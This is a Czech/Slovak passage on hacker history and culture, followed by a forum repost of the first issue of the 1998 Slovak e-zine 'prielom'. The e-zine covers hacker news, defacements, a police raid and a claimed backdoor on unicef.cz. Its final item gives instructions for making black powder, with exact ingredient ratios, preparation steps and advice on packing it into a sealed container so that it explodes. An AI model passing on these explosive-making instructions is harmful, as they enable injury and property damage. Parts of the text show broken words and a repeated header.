zato pomahali s jejich pocitacema a s nadsenim hnali kupredu
pokrok.


Potom prisla druha generace hackeru. Bylo to v dobe, kdy
pocitace byly vcelku nedostupne -- predevsim prave proto aby se
nedostaly do nespravnych rukou. Hackeri druhe generace se
probouravali do chranenych salovych pocitacu, aby mohli vyuzivat
jejich vykon, kradli pomoci kreditnich karet (carding), aby si
mohli kupovat male a nevykone - avsak stale drahe - pocitace.
Tito rebelove byli oznaceni za nebezpecne zlocince. Bojovali
proti monopolum, za to, aby stroje, pouzivane k rizeni zbrani
hromadneho niceni, byly pouzivany ve vzdelavani, charite,
ekologii a pomoci svetu. Tito hackeri sice byli mnoha lidmi
povazovani za zlocince a technologicke krysy, ale stale jeste
meli svou moralku, zasady a cile.


S masovim rozsirenim nejprve osmibitu a potom i PC se vsak i
tento argument vytratil. Hackeri treti generace hackuji, aby
dokazali, ze jsou lepsi nez spravcove. Nemaji mnoho moralnich
zabran, mazou stroje, schazuji cele site, na hacknutich strankach
delaji reklamu pornografii, poskozuji snahy nadsencu. Ano, i oni
maji svou subkulturu, sve kluby, setkani, zargon a historii.



*Phrack*

I hackerska subkultura ma svuj tisk. V samizdatovem
elektronickem casopise Phrack najdete technicke novinky, navody
na hackovani, popisy systemu, ale i navody na vyroby vybusnin,
zbrani ci infantilnich sipek do foukacky. Nechybi ani spolecenska
rubrika. Hlavnimi postavickami casopisu Phrack jsou Knight
Lighting a Taran King. Vychazi jednou za ctvrt roku uz od pocatku
osmdes tich let. Za tu dobu byl zatazen do nekolika skandalu a
soudnich sporu, avsak dari se mu vychazet dal.



2600

casopis 2600 (nazev je od frakvence tonu, kteri s americkimi
ustrednami delal divy) zalozil Emanuel Goldstein. Vychazi v
papirove podobe -- naprosto v souladu s americkou ustavou. V
mnoha zemich sveta jsou vzdy prvni ctvrtek v mesici porad na
setkani 2600, kde se zcela neskrivane hackeri schazeji.



Knizky

O historii hackingu, o padu site AT&T 15. ledna 1991 a o
naslednem zatahu na hackery (operace Sundevil) pojednava kniha
kyberpunkoveho spisovatele Bruce Sterlinga. Jeji ceski preklad se
da najit na slovenskem webu (http://hysteria.sk/zatah/)


Knizka Cliffa Stolla o honu na nemeckeho hackera, najmuteho
KGB, kteri zcela bezostysne prekonal chatrnou ochranu americkich
armadnich siti a ukradl mnozstvi tajnich dat, vysla i v cestine
pod nazvem Kukacci vejce.



Kukacci vejce

Cliff Stoll byl astronom a kdyz dosly prachy z jeho grantu,
byl presunut do pocitacoveho oddeleni. Jako novacek dostal
jednoduchi ukol - odhalit pricinu 75 centoveho dluhu za strojovy
cas. Odhalil v systemu hackera, kteri se skrz pocitacovou sit v
Berkeleyskych laboratorich dostaval do vojenske site Milnet.
Zalarmoval CIA, FBI i NSCA, ale nikdo mu nevenoval pozornost. Na
vlastni pest rozjel patrani po hackerovi s prezdivkou Hunter,
kteri byl nakonec dopaden v Nemecku a odsouzen. Jmenoval se
Marcus Hess a byl napojeni na Chaos Computer Club a KGB, ktere
prodaval americke tajne vojenske dokumenty, schemata vyvijenych
cipu i zdrojove kody systemu VMS.



Kyberpunk

Hackeri bivaji casto spojovani s proudem sci-fi, nazivanim
kyberpunk. jeho zakladatelem a zaroven nejvyraznejsim
predstavitelem je William Gibson, autor povidky Johny Mnemonic,
romanu Neuromancer, Virtual Light, Count Zero, Burning Chrome a
dalsich. Spolecne se Sterlingem napsal knihu Diference Engine. U
nas kyberpunkovou literaturu zastupuje predevsim Ondrej Neff.



... hacking u nas

Dve nejzn mejsi hackerske skupiny u nas a na Slovensku SERT a
CzERT na sebe plynule navazuji. CzERT vznikl vlastne z trosek
SERTu.



Syrup Emergency Reaction Team

SERT vznikl sponnt ne jako volne sdruzeni hackeru Komenskeho
university v Bratislave. Vetsinou se zameroval na boj s
nelegalnim softwarem (Warez), kterim spravcove plnili disky
skolnich serveru a ucpavali prenosove linky. Obcas nekomu poslali
vyzvu, aby warez odstranil, kdyz tak neucinil, smazali mu i celou
masinu. Na hackle stranky Tlacovej agentury SR umistili
clanek o SERTu o boji s pocitacovim piratstvim. Nastvali vsak az
nebezpecne moc lidi. Nakonec byl nalezen univerzitni pocitac,
ze ktereho pruniky podnikali, zabaven a dukladne zanalyzovan. Tri
lidi vyleteli ze skoly.



Czech Emergency Response Team

Nazev CzERT byl odvozen od SERT, kteri byl parodii na CERT,
americkou organizaci, kter se zabyva odhalovanim a zverejnovanim
chyb v pocitacovych systemech. Hacker Generic, jeden z CzERTu, si
myslel, ze SERT znamena Slovak Emergency......... a tak
vznikl Czech Emergency Response Team, jehoz cleny jsou vsak jak
cesi tak slovaci. Da -li se vubec o clenstvi mluvit, protoze
CzERT je pouze jakimsi spolecnim stitkem pro priblizne deset
hackeru. cas od casu
se cely CzERT sejde na CzERT SESSION, naposledy v lednu 1998 v Praze.



Skupina se stala proslou hlavne hacky Armady CR, Ministerstva
zdravotnictvi, MAmedii, Seznamu a Mobilu.

Posledni jmenovany prunik vsak byl pro jmeno skupiny osudni.
Server Mobil byl umisten na spatne chranene siti Netforce, kde
byl podle slov Neologica "uplni hackersky kabaret". Neologic
zmenil stranky, a teprve druhy den rano se dozvedel, ze server
www.mobil.cz byl kompletne smazan.


Sprava stranek patri k popularnimu druhu hacku, kteri serveru
jeste vetsinou udela reklamu. Smazani Mobilu vsak neprospelo
nikomu. CzERTi tvrdi, ze oni zmenili pouze stranky. Verejnost je
vsak presto odsuzuje. Nikdo nikomu vsak zatim nic nedokazal,
CzERTi nabidli spr vcum Mobilu pomoc v hledani hackera, avsak
pote komunikace zamrzla.



Kangaroo

00000001000001020061730200618175
hromisko
 hromisko      02.03.2004 - 22:19:52 , level: 1, UP   NEW


::::::::::. :::::::.. :::.,:::::: ::: ... . :
`;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;;
`]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ [[,[[[[, ,[[[[,
$$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$
888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM

prielom #1, 6.1.98, prielom(at)hysteria.sk, http://hysteria.sk/prielom/


obsah



intro

5 milionov hacknutych zo slovenskej sporitelne

cina zverejnila zbierku zakonov urcenych na cenzuru internetu

cZert session v prahe

unicef hacked

kriminalista chyta darebaky pocitacem

strelny prach (cerny prach)






intro



vianocny kapor bol super, ze ? ked som na stedry den tlacil do hlavy vyprazaneho kapra,
bola este fajn atmoska, ked som sa vsak potom vramci po-vianocnych
rodinnych navstev musel pozerat na spontanne-slintajucu babicku, sxizoidnu
tetu a ozraleho stryka a potom
nastupit po novom roku do roboty, bolo po nalade. prisli dlhe zimne januarove
vecery a s nimi napad na elektronicky casopis, ktory by nebol nicim podobny
na neviditelneho psa, netacika, modry svet a pod.. ale ktory by bol tak trochu
o vsetkom ostatnom. a tak je tu prve cislo e-zinu "prielom".. xcel by som aby
to bol tak zhruba dvojtyzdennik, alebo aspon mesacnik, pravdepodobne to vsak
bude "naladovnik", cize nove cislo prielomu vyjde vzdy ked budem mat fajn naladu a volny cas.


xcel by som aby prielom prinasal spravy o tej casti internetu, ktoru nepokryvaju
uz existujuce elektronicke casopisy. pre zaciatok planujem prinasat nejake spravicky
o computer undergrounde (pokial take nieco existuje), hackeroch, bezpecnosti pocitacovych
sieti a tak... xcem sa vyvarovat zbytocnych omaciek
a radsej podavat polosurove informacie zozbierane z roznych kutikov internetu bez zbytocnych komentarov.. planujem spravit nejake preklady zahranicnych zdrojov.. uz vobec by som
sa vsak nechcel montovat do nejakych pseudointelektualnych uvah o kyberpunku, kyberpriestore
a podobnych blbostiach, na to tu predsa mame casopis "zivel".


ako ste si vsimli, neuznavam grafiku, java scripty, animovane gify tlieskajucich ninja-kortynaciek
a podobne somariny moderneho webu. tiez neuznavam diakritiku, asi preto lebo
ju moj linuxik nepodporuje. moja nelaska k velkym pismenam prameni z niekolkych
rokov stravenych na irc, tam sa na take veci zvysoka kasle. dufam ze aj v takejto podobe sa to tu da vcelku zrozumitelne citat..
pripomienky, otazky, podnety a podobny komunikacny chabrus smerujte na prielom(at)hysteria.sk. vesele citanie


pajka, 28.1., liptovsky mikulas.




5 milionov hacknutych zo slovenskej sporitelne



do pocitacovej siete slovenskej sporitelne vstupil 14. januara 29-rocny
haqer z trnavy a z vnutrobankoveho uctu v kosiciach si
pretransferoval 5 melonov. peniaze si previedol na svoj vlastny ucet
do trnavy.. to bol zjavne ten kamen urazu.. na druhy den si to prehodil na
svoj ucet do tatrabanky. potom sa rozbehol vybrat si peniaze v hotovosti, ale
samozrejme uz na neho cakala policia a zadrzala ho pekne v banke. momentalne
sa nachadza vo vysetrovacej vazbe.





cina zverejnila zbierku zakonov urcenych na cenzuru internetu



30 decembra 1997 zverejnilo ministerstvo vnutra ciny novu vyhlasku o
"regulacii bezpecnosti a manazmentu pocitacovych informacnych sieti a
internetu". nemyslim si ze by Cina zmenila nejak radikalne svoj postoj
k internetu, skor islo o to, ze sa skupinka komunistickych internet-analfabetov
pokusila napisat zbierku pravidiel a zakonov ktore by dokazali rozskatulkovat
obrovske mnozstvo informacii na internete a vyradit vsetko "nevhodne".


plne znenie originalu a aj anglickeho prekladu tychto zakonov je zverejneny
kdesi na internete. medzi najabsurdnejsie patria :



- je zakazane prostrednictvom internetu tvorit klamstva alebo menit pravdu, rozsirovat klebety,
narusovat poriadok v spolocnosti. (paragraf 5, odsek 5)



- je zakazane prostrednictvom internetu propagovat feudalne nazory, sexualne sugestivny material,
hazardne hry, nasilie, vrazdy (paragraf 5, odsek 6)



- je zakazane prostrednictvom internetu poskodzovat povest statnych organov (paragraf 5, odsek 8)



jeden z paragrafov tiez zakazuje usilovat sa o "rozdelenie krajiny", cim cina
priamo atakuje separatisticke hnutia v Tibete a Xinjiangu. cina tiez priamo
blokuje domace stranky vacsiny cinskych dissidentov, ktori pouzivaju internet
na politicky boj a na svojich www strankach kritizuju cinsku vladu.


nova zbierka zakonov je tiez urcena na filtrovanie pocitacovej kriminality,
hackovania, virusov a podobne. Ako trest za tento druh kriminality uviedli blizsie nespecifikovane
"kriminalne tresty" a financne pokuty do 15,000 juanov (priblizbe 65 000 Sk).





cZert session v prahe


v sobotu 17.1. sa uskutocnila cZert session v prahe. bolo tam asi zo
dvadsat-tridsat haqerozov, kyberadminov, lameroidov a aj zopar ludi.. ja vlastne ani presne
neviem kto tam vsetko bol, ale ak to xcete vediet - spytajte sa policie
ceskej republiky. perlickou celej
akcie totiz bol zasah policie, ktory zacal tym, ze na vaclavaku pred konom
postavali dvaja prudko nenapadni
pani a natacali celu session na kameru. ked na nich par ludi od cZertu
ukazalo prstom, hned trhli
kamerou a zacali natacat vchod do metra... neskor sa cela session presunula
do istej restauracie v
centre prahy. tam po hodinke veselej konverzacie vtrhlo sest policajtov a
vyzvali vsetkych pritomnych aby sa legitimovali. nase protestne otazky
odbavili imho dost trapnu vyhovorku, zevraj dostali informaciu ze sa v tej
restauracii nachadza "pachatel loupezniho prepadeni". na otazky ohladne
popisu tohoto pachatela odpovedali ze "kazdy z tady pritomnych by
zodpovedel tomu popisu". no a tak si opisali udaje z nasich dokladov a
odficali prec. seteuid dokonca tvrdil na mamedii ze zistil ze sa v tej
restauracii nachadzali aj traja slimaci, t.j. undercover fizli.. je mi
ich dost luto, lebo museli chudaci cely vecer pocuvat a este nedajboze
aj zapisovat nasu unixacko-kompjuteroidnu konverzaciu.


o tom, ze policia ceskej republiky teda konecne odhalila cZerta teda uz
nie je ziadnych pochyb. koniec-koncov aj pan policajny kapitan jiri dastych
oznamil na tlacovke v brne ze uz je cZertovi na stope a ze je iba otazka
casu kedy ho strci za mreze. teraz ked uz policia pozna haqerozov uz
zostava policajstkemu zboru iba zistit kde je to ten "internet", co je to
ten "unix", ake zariadenie je to vlastne ten "server". pravdepodobne na
zistenie tychto informacii sluzila sobotnajsia policajna akcia.






unicef hacked


7. januara hackla skupina hackerov pod nalepkou DAMM (Drunkz Against Madd
Mothers) domacu stranku organizacie unicef. hackeri zmenili html
fajly a vyvesili tam vystrahu ze spravia z internetu "holocaust", ak nebude prepusteny kevin
mitnick. kevin mitnick - znamy emericky hacker, pravda, stale sedi vo federalnom vezeni za par veci
suvisiacich s behanim po serveroch. DAMM odovodnil hacknutie unicefu tym,
ze
"kevin mitnick je vlastne iba velke decko, a unicef je tu prave na to aby
ochranoval decka". dalej tam uviedli ze ak do 20. februara neprepustia
kevina mitnicka z lapaku, kazdy den podhodia 100 deti dvadsat vyhladovelym
super-modelkam. zo zdroju blizkeho irc som sa dozvedel ze je to ta ista
parta hackerov ktora na par minut hackla yahoo. o tom hacku
na www.yahoo.com sa hovorilo zevraj sa tam umiestnil nejaky virus ktori si
vsetci navstevnici stiahli. ten virus mal niekedy koncom januara '98
znicit cely internet. bol to samozrejme dost nevydareny zartik, ale ked
si k nemu primyslime tupu ignorantsku nevedomost o svete pocitacov, v
ktorom vacsina novinarov zije, vznikol z toho skandal ktory niekolko tyzdnov
zivoril na titulnych strankach mnohych novin.


unicef ma tiez stranky aj v cechah a na slovensku. v cechach je to u inet
providera lanprojekt, o ktorom je uz asi dost zname ze tam cZert
obcas robi kabaret. asi uz nie je velke tajomstvo ze sa na www.unicef.cz
nachadza 5002 cZert backdoor, akurat sa zjavne caka na niekoho kto by spravil
html fajly.





kriminalista chyta darebaky pocitacem



kdyz chce kapitan jiri dastych z prazske kriminalky chytit nejakeho
lotra, tak si nenazuje pohodlne boty ani si nevezme do kapsy lupu. usedne k
poci t aci. jeho praci je totiz stihani pocitacovych piratu. "je to prace jako
kazda jina, nic atraktivniho na ni nevidim," rika muz, ktery sam sebe oznacuje
za jedineho predstavitele softwarove policie v zemi. kazdy den useda v
kancelari ke svemu soukromemu pocitaci s postarsim procesorem 486, ktery by
byl tem, po nichz patra, nejspis pro smich. "ne, policejni pocitac nemam.
donesl jsem si do prace svuj vlastni, abych mel na cem delat," prozrazuje
stripek ze zakulisi boje s pocitacovou kriminalitou dastych. "mame vyhodu, ze
pocitacova kriminalita je pomerne mlada a zlocinci pred nami nemaji takovy
naskok. o krok pozadu za nimi ale budeme porad," tvrdi kriminalista. presto
podle neho nema vyznam zakladat pro boj s pocitacovou kriminalitou specialni
utvar, spis mu jde o rozjeti systemu, v nemz by bezni policiste chytali
pocitacove piraty stejne samozrejme jako zlodeje z kocarkarny."zakladat
specialni oddeleni by bylo uplne zbytecne. sit distributoru ilegalniho softwaru u
nas neni nijak rozsahla. vetsinou jde jen o dva tri nadsence, z nichz jeden ma
treba pres internet pristup k softwaru a ostatni kopiruji diskety a cedecka,
ktera dal prodavaji bud na burzach, nebo na inzerat," vysvetluje dastych.
podle neho neni problem dostat na jeden cd-rom nelegalni software za milion
korun. pak ovsem muze jit pachatel za jedine piratske cedecko do vezeni az na
pet let. jak vypada bezne vybaveni pocitacoveho pirata, si mohli prohlednout
navstevnici na veletrhu invex ve stanku policie a ministerstva vnitra. v
prosklenych vitrinach zde byly k videni pocitace, katalogy, hory cd-rom,
disket a tvare odhalenych piratu prelepene cernou paskou. "byl to muj napad,"
priznava pysne kriminalista. "aby si navstevnici uvedomili, ze pocitacovi pirati
jsou lide z masa a krve. ze se jim muze stat kazdy, kdo si nelegalne zkopiruje
od kamarada disketu," vysvetluje svuj zamer. krome pocitacovych piratu se
kapitan dastych pidi i po takzvanych hackerech, kteri se na internetu
pokouseji probourat na nepovolena mista. nekdy se jim to povede, jako letos
na jare hackerovi, ktery se oznacuje jako czert. ten se dostal na webovske
stranky nekolika ministerstev a ty pak neuctive pozmenil.
"czert ted zalezl, chytit ho muzeme, az zas neco provede," konstatuje dastych.
je presvedcen, ze czert neni jeden clovek, ale parta mladych lidi, kteri bydli v
hlavnim meste. "hackeri jsou takovi pocitacovi exhibicionisti. predpokladam,
ze az je chytneme, budou pysni na to, jak nam zamotali hlavy," uvazuje jediny
softwarovy policista v zemi. (zdroj : daniel zasmeta, mf dnes)





Strelny prach  (Cerny prach)



Strelny prach je takovej zakladni pyromanskej artefakt hned po
sirkach
a granatech. Je to asi nejstarsi vybusnina na svete, ktera se pouziva
dodnes. Sama o sobe samozrejme nevybuchuje. Sama o sobe pouze prudce
hori a produkuje spoustu dymu. K tomu, aby strelny prach vyvolala
detonaci potrebujete nejakou pevnou krabicku nebo uzavrenou trubku nebo
cokoliv pevneho do ceho ho nasypete. Tim tlakem ktery vyvine nastane
vybuch. A nebo se muzete pouzit jako palivo do raketoveho
motoru, ale ten s popiseme az v neterem pristim dile.

   A nini pristupme k vyrobe, strelneho prachu. Ta je celkem snadna
potrebujete pouze : Drevene uhli, KNO3 - Dusicnan Draselny (Da se
bezne sehnat v drogerii, jelikoz se  pouziva jako hnojivo a na
konzervaci masa) a Siru.
Kazda z latek se dukladne rozemele a rozetre v treci misce na jemny
prasek a pote se smisi s ostatnimy.
V tomto pomeru :


                                       KNO3 (Dusicnan draselny)  ... 75%
                                       Sira                      ... 10%
                                       Drevene uhli              ... 15%

Dokonale se promycha. A tim vznikne obycejny strelny prach.
Pokud chcete aby horlavost byla jeste lepsi tak ho zkuste namocit a
potom ususit. Znovu peclive rozetrit a rozemlyt to muzete nekolikrat
zopakovat. Tim vznikne opravdu dokonale horlavy strelny prach.

Mozek, http://hysteria.sk/mozek/





00000001000001020061730200618171
hromisko
 hromisko      02.03.2004 - 22:17:33 , level: 1, UP   NEW


::::::::::. :::::::.. :::.,:::::: ::: ... . :
`;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;;
`]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ [[,[[[[, ,[[[[,
$$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$
888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM

prielom #1, 6.1.98, prielom(at)hysteria.sk, http://hysteria.sk/prielom/